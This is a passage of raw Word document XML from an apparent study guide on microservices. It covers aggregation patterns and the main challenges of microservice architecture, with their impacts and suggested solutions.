          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12645B42"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The client sends a request to a service (or API Gateway).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F0DA2C8"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The service makes parallel calls to other microservices.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="392AA826"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Once all responses are received, they are aggregated and sent back to the client.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34819D4F"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Example</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: A Customer Profile service fetches data from Order Service, Shipping Service, and Inventory Service in parallel, then aggregates the responses into a single view of the customer profile.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B7CC1EE"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Pros</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C28A652"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Reduces overall latency by making concurrent calls.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E817022"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More efficient than sequential calls when services are independent.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36B781BF"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ons</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38F95B79"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Potential issues if services depend on each other or if one service fails.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5136F7B0"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Requires proper error handling and coordination between parallel calls.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44C906C2"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5B0A1361">
          <v:rect id="_x0000_i2888" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F1528ED"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5. Event-Driven Aggregation Pattern</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19CFEDE2"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Overview</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: In this pattern, services publish events to a messaging system (e.g., Kafka, RabbitMQ), and other services subscribe to these events. When a service receives an event, it fetches the required data and aggregates it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58E5AC39"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Use Case</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Suitable for asynchronous systems where real-time aggregation is not required, and the system needs to react to data changes across multiple services.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E0CFE97"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How it works</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="538FD8AC"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lastRenderedPageBreak/>
        <w:t>Microservices publish events to a messaging system when relevant data is updated.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50781507"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Other services subscribe to these events, fetch the necessary data, and aggregate it asynchronously.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29CB7F84"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Example</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: When an Order Service updates an order status, an event is published to a message queue. A Customer Service subscribed to that event fetches the necessary data, aggregates it, and updates the customer profile accordingly.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EE7B9D9"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Pros</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AD1C44D"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Decouples services, improving flexibility and scalability.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C648B38"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Supports asynchronous communication and eventual consistency.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="383DEDF6"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ons</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ADED1B5"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Can lead to complex event flows and tracking.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="111FD058"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May require additional infrastructure (message brokers).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C886D4E"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2C965013">
          <v:rect id="_x0000_i2889" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="68D5F8B0"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6. Composite Service Pattern</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73B27058"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Overview</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: A composite service aggregates responses from different microservices, typically using orchestration within a single service that coordinates multiple service calls.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F8CDC34"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Use Case</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Suitable when you need to orchestrate complex business logic or interactions between multiple microservices to fulfill a single request.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79E870A8"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How it works</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6536DEF4"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A composite service acts as a single endpoint that is responsible for coordinating calls to multiple microservices.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="051435A6" w14:textId="77777777" w:rsidR="00312742" w:rsidRPr="00FA65E9" w:rsidRDefault="00312742"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It aggregates data from these services and performs additional logic before returning the final response.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="735AD035"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Example</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: A Product Service calls Inventory Service, Pricing Service, and Shipping Service to compile the product's full details (price, availability, and shipping options).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DF27637"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Pros</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59AE0AA6"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Simplifies complex workflows by centralizing orchestration logic.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04DB6716"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Ensures business rules are adhered to in the aggregation process.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="700E763B"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ons</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75DA9AF5"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Could lead to a bottleneck if the composite service becomes too complex or overloaded.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E77AE00"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Increased risk of failure in case one service is down or slow.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="305B1FBA"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1D8AA898">
          <v:rect id="_x0000_i2890" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="32DCE15D"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Conclusion:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EBE6880"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sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Each aggregation pattern has its strengths and weaknesses, and the choice of pattern depends on the specific use case, latency requirements, scalability, and complexity of the microservices involved. The </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>API Gateway</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Backend for Frontend (BFF)</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> patterns are commonly used for client-facing aggregation, while </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Event-Driven Aggregation</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Composite Services</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> are suited for more asynchronous or complex use cases. Understanding these patterns will help you design efficient and scalable microservices architectures.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F6C587F" w14:textId="44900E77" w:rsidR="00115965" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00115965">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:pict w14:anchorId="2EE5E507">
          <v:rect id="_x0000_i2891" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AB2F991" w14:textId="61698E9B" w:rsidR="001659D4" w:rsidRPr="00CE4B95" w:rsidRDefault="00AF4871">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="692" w:name="_Toc196308172"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What are challenges in Microservice architecture</w:t>
      </w:r>
      <w:r w:rsidR="001659D4" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="692"/>
    </w:p>
    <w:p w14:paraId="1AE96ACC" w14:textId="6B60A645" w:rsidR="00312742" w:rsidRPr="00FA65E9" w:rsidRDefault="00312742" w:rsidP="00FA65E9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Microservice architecture brings several benefits, such as improved scalability, flexibility, and maintainability, but it also introduces certain challenges. Here are some of the main challenges associated with adopting and managing microservices:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07B2D4C7"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1. Complexity in Service Management</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72998066"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hallenge</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Microservices involve multiple services, each with its own database and lifecycle. Managing many services can become complex, especially when the number of services grows.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05DFCC68"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Impact</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Increased operational overhead, complexity in monitoring, and difficulty in debugging and troubleshooting.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75B1754A"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Solution</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Implement service discovery, centralized logging, and monitoring tools (e.g., Prometheus, Grafana, ELK stack) to manage complexity.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33ED8AF9"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4092C0E9">
          <v:rect id="_x0000_i2892" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AF94C4C"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2. Inter-Service Communication</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08F0D149"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hallenge</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Microservices often need to communicate with each other, and managing these interactions, especially in large systems, can be tricky. Issues related to latency, data consistency, and network failures arise.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1999908C"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Impact</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Communication delays, network congestion, and complex error handling.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="334B1916"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Solution</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Use asynchronous messaging, service meshes (e.g., Istio), or API gateways to streamline inter-service communication. Implement retries, circuit breakers, and timeouts for fault tolerance.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="630E2CBE"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58FF7F2A">
          <v:rect id="_x0000_i2893" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="31D7675D"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3. Data Management and Consistency</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FA53BAB"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lastRenderedPageBreak/>
        <w:t>Challenge</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Each microservice typically manages its own database, which can lead to data duplication and the need for eventual consistency across services.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70EEE3A3"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Impact</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Data inconsistency, challenges in managing transactions (especially in distributed systems), and difficulties in querying across services.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="179FE039"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Solution</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: Use patterns like </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Event Sourcing</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>CQRS (Command Query Responsibility Segregation)</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, and </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Saga Pattern</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to handle distributed transactions and eventual consistency.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B69B5DC"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5CBE43E6">
          <v:rect id="_x0000_i2894" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="517299E1"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4. Distributed Transactions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34862860"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hallenge</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Ensuring data consistency in distributed systems is difficult. Traditional ACID transactions don’t work well in microservices since each service has its own database.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19C7CA56"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Impact</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Difficulties in maintaining consistency, especially when a service fails in the middle of a transaction.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20AA0875"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Solution</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: Use eventual consistency and approaches like </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Saga Pattern</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to manage distributed transactions without relying on ACID properties.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3613215C"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0A3FC000">
          <v:rect id="_x0000_i2895" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="16F38A62"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5. Testing and Debugging</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1810A1C7"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hallenge</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Testing microservices can be difficult because you need to test interactions between multiple services, both independently and as a whole.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="511B1068"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Impact</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Increased complexity in writing and maintaining tests, especially for integration and end-to-end testing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="165139B4"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Solution</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: Use </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>contract testing</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>service virtualization</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, and </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>mocking</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. Implement automated testing strategies like </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
